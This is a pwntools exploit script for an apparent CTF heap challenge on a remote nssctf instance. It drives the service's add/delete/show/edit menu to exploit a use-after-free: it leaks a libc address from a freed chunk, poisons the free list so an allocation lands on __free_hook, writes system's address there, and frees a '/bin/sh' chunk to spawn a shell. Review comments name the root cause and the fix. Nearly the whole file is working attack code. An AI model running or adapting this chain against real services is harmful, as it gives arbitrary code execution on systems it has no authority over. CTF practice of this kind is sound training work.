from pwn import *
from sympy import oo  # NOTE(review): `oo` is never referenced in this file; unused import.

# pwntools debug level: the tube logs every byte sent and received, which is
# what you want while the menu prompts below are being matched by hand.
context.log_level = 'debug'
# Remote challenge instance; host and port are the ones given on the page.
p = remote('node4.anna.nssctf.cn',28937)
# Local copy of the target's libc; every address computed later is rebased
# from its symbol table, so it must be the same build the service runs.
libc = ELF("./libc.so.6")


def add(idx, size):
    """Drive menu option 1 for slot *idx* with request size *size*.

    The service asks for the index first and the size second; both are
    sent as their decimal text form, each after the matching prompt.
    """
    send = p.sendlineafter
    send(b">>", b'1')
    send(b'idx?', str(idx).encode())
    send(b'size?', str(size).encode())
def delete(idx):
    """Drive menu option 2 for slot *idx*.

    Sends the choice and then the index as decimal text after the
    ``idx?`` prompt; nothing is read back here.
    """
    send = p.sendlineafter
    send(b">>", b'2')
    send(b'idx?', str(idx).encode())
def show(idx):
    """Drive menu option 3 for slot *idx*.

    Only the request is sent; the caller is responsible for reading
    whatever the service prints in response.
    """
    send = p.sendlineafter
    send(b">>", b'3')
    send(b'idx?', str(idx).encode())
def edit(idx, content):
    """Drive menu option 4: send raw *content* (bytes) for slot *idx*.

    *content* is passed through unchanged after the ``content :`` prompt;
    ``sendlineafter`` appends the newline, so callers should not.
    """
    send = p.sendlineafter
    send(b">>", b'4')
    send(b'idx?', str(idx).encode())
    send(b'content :', content)
# --- Stage 1: address leak ---------------------------------------------------
# Slot 0 is freed and then shown: the service still serves reads from a freed
# slot (use-after-free read). That missing "slot cleared on delete" check is
# the root cause everything below builds on.
add(0,0x450)
add(1,0x10)
delete(0)
show(0)
p.recvuntil(b'content : ')
libc_x = p.recvline()[:-1]  # strips the trailing newline; assumes the reply ends with one
libc_x = u64(libc_x.ljust(8,b'\x00'))
# The leaked value is treated as __malloc_hook + 0x70 inside libc and every
# other address is rebased from it. Both the 0x70 constant and the symbol
# offsets are specific to the ./libc.so.6 build; a mismatch with the remote
# libc makes the computed addresses wrong. NOTE(review): a libc that does not
# export these symbols presumably fails here with a KeyError.
libc_base = libc_x - 0x70 - libc.symbols['__malloc_hook']
free_hook = libc_base + libc.symbols['__free_hook']
sys_addr = libc_base + libc.symbols['system']
# --- Stage 2: write through a freed slot ---------------------------------------
# Slot 3 is edited after it was freed (use-after-free write); the script then
# expects the allocation made as slot 6 to land on free_hook and overwrites it
# with the address of system.
add(2,0x30)
add(3,0x30)
add(4,0x30)
delete(2)
delete(3)
edit(3,p64(free_hook))
add(5,0x30)
add(6,0x30)
edit(6,p64(sys_addr))
# --- Stage 3: trigger -----------------------------------------------------------
# Freeing slot 7, whose content is "/bin/sh", is what invokes the hook.
add(7,0x30)
edit(7,b'/bin/sh\x00')
delete(7)
# NOTE(review): both primitives (stages 1 and 2) come from the same defect,
# reading/writing a slot after delete(); nulling the slot pointer on delete
# removes them. The chain is also libc-version specific: it needs a libc that
# still exports __malloc_hook/__free_hook — confirm against the actual build.
p.interactive()